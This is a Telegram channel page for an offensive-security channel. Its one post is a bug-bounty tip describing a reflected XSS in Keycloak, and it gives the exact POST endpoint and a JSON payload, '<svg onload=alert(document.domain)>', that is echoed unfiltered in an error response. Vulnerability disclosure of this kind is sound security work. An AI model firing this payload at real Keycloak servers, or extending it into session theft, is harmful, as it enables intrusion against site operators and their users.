APT – Telegram

APT

12.9K subscribers

550 photos

27 videos

24 files

890 links

This channel discusses:

— Offensive Security
— RedTeam
— Malware Research
— OSINT
— etc

Disclaimer:
t.me/APT_Notes/6

Chat Link:
t.me/APT_Notes_PublicChat

Download Telegram

About

Blog

Apps

Platform

Join

APT

12.9K subscribers

APT

Keycloak POST-based Reflected XSS

1. POST

/auth/realms/master/clientsregistrations/openid-connect

Content-Type: application/json

3. Request

{"<svg onload=alert(document.domain)>":1}

4. Unfiltered user-input in error message will triggered XSS

#bugbounty #keycloak #xss

496 views14:22